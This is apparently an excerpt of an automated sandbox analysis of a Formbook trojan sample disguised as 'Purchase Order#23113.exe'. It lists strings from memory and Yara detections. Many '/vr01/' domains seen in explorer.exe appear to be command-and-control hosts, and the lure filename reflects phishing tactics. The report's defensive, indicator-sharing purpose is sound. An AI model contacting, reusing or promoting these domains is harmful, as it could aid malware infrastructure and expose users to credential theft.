          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.com/vr01/www.sampleshubusa.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gratiasempirellc.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shop/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shop/vr01/www.entelnegocio.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kidscircle.shopReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.com/vr01/www.mks-digital.net
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.massagechairspecialists.comReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.com/vr01/www.yoursweets.online
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mingshengglass.comReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.net
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.net/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.net/vr01/www.brandonbirk.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mks-digital.netReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.co
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.co/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.co/vr01/www.gratiasempirellc.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oregonjobs.coReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shop/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shop/vr01/www.yesxoit.xyz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.owletbaby.shopReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000000.00000002.1773771205.0000000006170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.com/vr01/www.topdeals.biz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sampleshubusa.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.com/vr01/www.owletbaby.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.snugandkind.comReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.com/vr01/www.oregonjobs.co
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.studioenginedemo.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.biz/vr01/www.kidscircle.shop
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.topdeals.bizReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.info
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.info/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.info/vr01/www.mingshengglass.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xaqh.infoReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyz/vr01/www.studioenginedemo.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yesxoit.xyzReferer:
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.online/vr01/www.massagechairspecialists.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yoursweets.onlineReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000003.00000002.4209139867.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1780447138.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000000.1780447138.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4208251758.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000002.4199885899.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1773684404.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3107031685.000000000371C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1773041835.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4201075329.000000000371D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106694802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000003.3106694802.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205364181.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000000.1775351799.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg

          E-Banking Fraud

          Source: Yara match, File source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4209826259.000000000E656000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_772cc62d, Author: unknown
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6564, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: Purchase Order#23113.exe PID: 6636, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: cscript.exe PID: 1068, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, -Module-.cs, Large array initialization: _200E_200E_206B_200B_206D_200F_200F_200C_200E_202B_202C_200D_200F_202C_202E_202B_206F_206D_202E_200B_202D_206B_202E_202C_202C_202B_206A_206C_202A_206B_200D_202C_202B_202B_206E_206E_206C_206E_206C_206F_202E: array initializer size 2976
          Source: initial sample, Static PE information: Filename: Purchase Order#23113.exe
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe, Code function: 2_2_0041A410 NtReadFile,2_2_0041A410
